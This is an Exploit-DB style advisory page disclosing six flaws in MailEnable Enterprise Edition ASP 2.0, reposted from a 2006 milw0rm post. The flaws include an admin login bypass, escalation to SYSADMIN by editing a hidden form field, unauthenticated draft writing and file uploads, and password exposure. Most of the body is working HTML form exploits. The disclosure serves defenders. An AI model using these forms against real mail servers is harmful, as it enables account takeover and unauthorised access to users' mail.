Multiple Bugs in MailEnable Enterprise Edition ASP Version

vendor:

Enterprise Edition ASP

by:

Soroush Dalili

8,8

CVSS

HIGH

Authentication Bypass, Privilege Escalation, Cross-Site Scripting, Session Hijacking

287, 264, 79, 613

CWE

Product Name: Enterprise Edition ASP

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: YES

Related CWE: N/A

CPE: a:mailenable:enterprise_edition_asp:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Multiple Bugs in MailEnable Enterprise Edition ASP Version <= 2.0

Multiple bugs in MailEnable Enterprise Edition ASP Version <= 2.0 allow an attacker to bypass authentication, gain elevated privileges, perform cross-site scripting, and hijack user sessions.

Mitigation:

Ensure that authentication is properly implemented and that user sessions are properly protected.

Source

Exploit-DB raw data:

Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I found multiple bugs in 
MailEnable Enterprise Edition ASP Version <= 2.0 that I listed them below:

1) - Any user can login to web administration site.
2) - Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!
3) - Every one (ever no authenticated user) can write a message in "Draft" folder of any users!
4) - Every one can make "myupload.ams" on server in "drafts" folder of every user!
5) - Every one can make "_myupload.csv" on server in "drafts" folder of every user!
6) - For changing password it need the current password but current password is mention in source of "ListAttachments.asp" file, if XSS attack or Session hijacking happened then attacker can gain the user's current password.



Details' Descriptions:

1)
Any user can login to web administration site with bug in "main.asp" (Enterprise)

Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/meadmin/enterprise/lang/EN/main.asp" METHOD="POST">
	POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="postmaster"><br>
<input type=submit>
</FORM>
-----------------------End----------------------------

2)
Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!

Bug in "MailOptions.asp" file: remote authenticated user can change value of hidden field (name="LoginRights") 
from "USER" to "ADMIN" or "SYSADMIN" and change it's level to up! or change value of hidden field 
(name="LoginStatus") to "0" to disable him/her account!

Proof's exploit:
-----------------------Start--------------------------
<FORM METHOD="post" ACTION="http://[URL]/MEWebMail/base/default/lang/EN/MailOptions.asp?SelectedIndex=1&FormAction=Edit">

<TABLE BORDER="0">
	<TR><TD>Current Password:</TD><TD><INPUT name=LoginPassword VALUE=""></TD></TR>
	<TR><TD>New Password:</TD><TD><INPUT name=NewLoginPassword VALUE=""></TD></TR>
	<TR><TD>Confirm New Password:</TD><TD><INPUT name=ConfirmNewLoginPassword VALUE=""></TD></TR>
</TABLE>
<INPUT NAME="LoginDescription" VALUE="Login description">
<INPUT NAME="LoginRights" VALUE="SYSADMIN">
<INPUT NAME="LoginStatus" VALUE="1">
<BR><BR>
<INPUT type=submit value="UpTime!">
</FORM>
-----------------------End----------------------------

3)
Every one (ever no authenticated user) can write a message in "Draft" folder of any users!
Bug in "Resolve.asp" file: this file don't check authenticated user!

Proof's exploit:
--------------Start---------------------
<FORM METHOD="post" ACTION="http://[url]/MEWebMail/base/default/lang/EN/Forms/MAI/Resolve.asp">

<TABLE BORDER="0">
	<TR><TD>ME_MAILBOX:</TD><TD><INPUT name=ME_MAILBOX VALUE=""></TD></TR>
	<TR><TD>ME_POSTOFFICE:</TD><TD><INPUT name=ME_POSTOFFICE VALUE=""></TD></TR>
	<TR><TD>Folder:</TD><TD><INPUT name=Folder VALUE=""></TD></TR>
	<TR><TD>ID:</TD><TD><INPUT name=ID VALUE=""></TD></TR>
	<TR><TD>ComposeMode:</TD><TD><INPUT name=ComposeMode VALUE="General"></TD></TR>	
	<TR><TD>MsgFrom:</TD><TD><INPUT name=MsgFrom VALUE=""></TD></TR>
	<TR><TD>MsgCc:</TD><TD><INPUT name=MsgCc VALUE=""></TD></TR>
	<TR><TD>MsgTo:</TD><TD><INPUT name=MsgTo VALUE=""></TD></TR>
	<TR><TD>MsgBCC:</TD><TD><INPUT name=MsgBCC VALUE=""></TD></TR>
	<TR><TD>MsgBody:</TD><TD><INPUT name=MsgBody VALUE=""></TD></TR>
	<TR><TD>MsgSubject:</TD><TD><INPUT name=MsgSubject VALUE=""></TD></TR>
</TABLE>
<BR><BR>
<INPUT type=submit value="Update"  CLASS=ME_Button>
</FORM>
--------------End---------------------

4)
Make "myupload.ams" on server in "drafts" folder of every user!
Show Mail Enable folder's path if "username" or "postoffices" be incorrect!

Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/default/lang/EN/Forms/MAI/UploadAttachment.asp" ENCTYPE="multipart/form-data" METHOD="POST">
	MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test"><br>
	POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
	AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
	AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
	Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
	Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
	ID<INPUT NAME=ID TYPE="text" VALUE="test"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------

5)
Make "_myupload.csv" on server in "drafts" folder of every user!
Show Mail Enable folder's path if "username" or "postoffices" be incorrect!
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/enterprise/lang/EN/Forms/vcf/uploadcontact.asp" ENCTYPE="multipart/form-data" METHOD="POST">
	MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test123"><br>
	POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
	AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
	AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
	Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
	Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
	ID<INPUT NAME=ID TYPE="text" VALUE="test123"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------

6)
Have password in source.
Proof:
-----------------------Start--------------------------
http://[URL]/MEWebmail/base/enterprise/lang/EN/Forms/MAI/ListAttachments.asp?Mode=Compose&ID=test.MAI&MsgFormat=HTML&FormAction=Send&ComposeMode=General&Folder=%5CDrafts
-----------------------End----------------------------


Product name: MailEnable Enterprise Edition
Version: All ASP version <= 2.0
URL: www.mailenable.com
Finder: Soroush Dalili
Team: GSG [Grayhatz.net]
Country: Iran
Site: Grayhatz.net
Email: IRSDL[a.t]Yahoo[d0t]Com

<< I hope secure world for all >>

# milw0rm.com [2006-06-09]